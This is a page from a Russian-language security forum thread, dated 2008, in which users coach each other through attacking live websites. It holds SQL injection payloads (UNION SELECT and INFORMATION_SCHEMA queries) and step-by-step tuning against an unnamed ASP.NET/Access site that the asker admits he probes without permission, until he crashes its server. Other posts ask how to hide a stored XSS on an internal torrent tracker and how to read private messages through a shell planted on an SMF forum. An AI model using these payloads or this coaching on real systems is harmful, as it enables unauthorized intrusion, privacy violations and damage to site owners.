ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 381 из 1393 « Первая < 281331371 377 378 379 380 381 382 383 384 385 3914314818811381 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #3801  
Старый 21.11.2008, 23:42
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
tempuser
помнится когда я хекал maccess делал чтото типо этого для вывода табл.
Цитата:
http://site.com/page.aspx?page=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+('views'))--
а так бы ссылочку посмотреть )
 
Ответить с цитированием

  #3802  
Старый 21.11.2008, 23:51
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию
Цитата:
помнится когда я хекал maccess делал чтото типо этого для вывода табл.
это был mssql, а не access
Цитата:
Exception Details: System.InvalidCastException: Specified cast is not valid
видимо проблемы с преобразованием типов данных, хотя для access это не свойственно. Возможное решение можно бы было найти в MS Access Cheat Sheet, но тот сайт закрыли. Ни у кого не осталось?
upd а вот нашел - http://www.xuexi123.net/chm/MS%20Access%20SQL%20Injection%20Cheat%20Sheet.htm
правда инфы по поводу преобразования типов данных нет
Последний раз редактировалось [Raz0r]; 21.11.2008 в 23:57..
 
Ответить с цитированием

  #3803  
Старый 21.11.2008, 23:56
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию
Time Machine
 
Ответить с цитированием

  #3804  
Старый 21.11.2008, 23:58
tempuser
Новичок
Регистрация: 21.11.2008
Сообщений: 5
Провел на форуме:
24866

Репутация: 0
По умолчанию
Цитата:
Сообщение от sabe  
tempuser
помнится когда я хекал maccess делал чтото типо этого для вывода табл.

а так бы ссылочку посмотреть )
Зачем в INFORMATION_SCHEMA.TABLES лезть то? Во первых её просто нету в access (вы с MySQL путаете :-) ), а во вторых имя нужной таблицы с пользователями известно на 100%. Также известны имена полей в этой табличке. Известна даже админка ))) Но блин тип какого то параметра походу не совпадает... И обломс.

Ссылочку - сорри. Сайт довольно дружественный, не хотелось бы случайно вандализировать :-) Ковыряюсь в нем из чистого любопытства.

Вот более подробно сообщение об ошибке:

Код:
Server Error in '/' Application.
Specified cast is not valid.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.InvalidCastException: Specified cast is not valid.

Source Error:

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.

Stack Trace:

[InvalidCastException: Specified cast is not valid.]
   System.Data.OleDb.OleDbDataReader.GetBoolean(Int32 ordinal) +44
   ecomm.CPage.InitFromDataReader(OleDbDataReader dr)
   ecomm.CPage..ctor(String ID, String PageName, String conStr)
   ecomm.PageTemplateControl.get_vieName()
   ecomm.PageTemplateControl.InitControl()
   ecomm.TemplateControl.CreateChildControls()
   System.Web.UI.Control.EnsureChildControls() +100
   System.Web.UI.Control.PreRenderRecursiveInternal() +38
   System.Web.UI.Control.PreRenderRecursiveInternal() +125
   System.Web.UI.Control.PreRenderRecursiveInternal() +125
   System.Web.UI.Control.PreRenderRecursiveInternal() +125
   System.Web.UI.Page.ProcessRequestMain() +1499


Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407
 
Ответить с цитированием

  #3805  
Старый 22.11.2008, 00:05
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию
Цитата:
http://url/page.aspx?page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21+from+tablename%00
попробуй все числа null'ами заменить:
union select null,null,null,...
потом последовательно заменяй null на числа, строки.
Вот список функций в Access, может понадобиться:
http://www.techonthenet.com/access/functions/index_alpha.php
 
Ответить с цитированием

  #3806  
Старый 22.11.2008, 00:18
tempuser
Новичок
Регистрация: 21.11.2008
Сообщений: 5
Провел на форуме:
24866

Репутация: 0
По умолчанию
Цитата:
попробуй все числа null'ами заменить:
Помогло :-) Правда не до конца, но похоже он ругается на четвертый параметр, при замене его на null ошибка изменяется на
Exception Details: System.NullReferenceException: Object reference not set to an instance of an object.
 
Ответить с цитированием

  #3807  
Старый 22.11.2008, 00:55
tempuser
Новичок
Регистрация: 21.11.2008
Сообщений: 5
Провел на форуме:
24866

Репутация: 0
По умолчанию
Пока ситуация такова:
1. На 2 следующих запроса
1,2,3,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21
1,2,3,CDec(1),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21
отвечает Object reference not set to an instance of an object

2. На все остальное вида
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21
1,2,3,CHR(66),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21
отвечает Specified cast is not valid . Проверены int, string, byte, bool, всякие даты, CDate.

null и double... Что у них общего и чем они отличаются от int или char? Или с double уже угадал и ему не нравится что то ещё? Но если угадал, то почему ошибка на остальное не cast как раньше а object reference?
 
Ответить с цитированием

  #3808  
Старый 22.11.2008, 01:32
tempuser
Новичок
Регистрация: 21.11.2008
Сообщений: 5
Провел на форуме:
24866

Репутация: 0
По умолчанию
В общем сервер немножко сломался :lol: Счас выкидывает ошибку Unspecified error прямо на главной странице сайта и в общем то не работает. Мда... Перестарались.......
 
Ответить с цитированием

  #3809  
Старый 22.11.2008, 19:15
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию
Вопрос с активной хсс вобщем на внтутресетевом торенте нашол активную хсс. Когда делаеш раздачю в название пишеш название потом пишу хсс она пашет но она отображается в название можно её скрыть как-то ?
 
Ответить с цитированием

  #3810  
Старый 23.11.2008, 03:35
gurman94
Новичок
Регистрация: 23.09.2008
Сообщений: 7
Провел на форуме:
43592

Репутация: 3
По умолчанию
Народ имееться шелл на двиге SMF 1.1.4
Когда смотрю Л.С. через базу то меня интересует когда ПМ отправилось!
А там показываеться это!


msgtime

1227282680

Как это понимать?
 
Ответить с цитированием
Ответ
Страница 381 из 1393 « Первая < 281331371 377 378 379 380 381 382 383 384 385 3914314818811381 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ